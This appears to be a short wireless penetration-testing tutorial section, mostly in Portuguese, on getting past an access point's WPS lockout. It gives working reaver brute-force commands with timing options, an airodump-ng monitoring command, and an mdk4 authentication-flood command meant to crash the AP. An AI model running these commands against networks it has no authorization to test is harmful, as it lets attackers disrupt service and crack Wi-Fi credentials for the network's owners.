Crashing a Target AP with MDK4
Durante nossos esforços para recuperar o PIN e o WPA-PSK, é provável que encontremos um bloqueio de ponto de acesso em algum momento. Nesta seção, demonstraremos como inundar e travar o AP pode ser usado como um desvio potencial.
Podemos ignorar isso usando nosso comando avançado, especificando o período de suspensão e o tempo entre as tentativas:
sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11
Ignorando o bloqueio de reinicialização do WPS por meio do MDK4
sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11
No segundo terminal, podemos monitorar nosso
WPS Locked
status comairodump-ng
e o--wps
filtro. Também especificamos nosso BSSID e canal, para excluir quaisquer pontos de acesso adicionais de nossa lista.
airodump-ng --wps --bssid 60:38:E0:XX:XX:XX -c 11 wlan0mon
Em nosso terceiro terminal, podemos empregar o seguinte comando para testar Authentication Denial-of-Service flooding. Especificamos o módulo de ataque
a
paraAuthentication Denial-of-Service
, e o endereço MAC do nosso ponto de acesso com-a
sudo mdk4 wlan0mon a -a 60:38:E0:XX:XX:XX
Last updated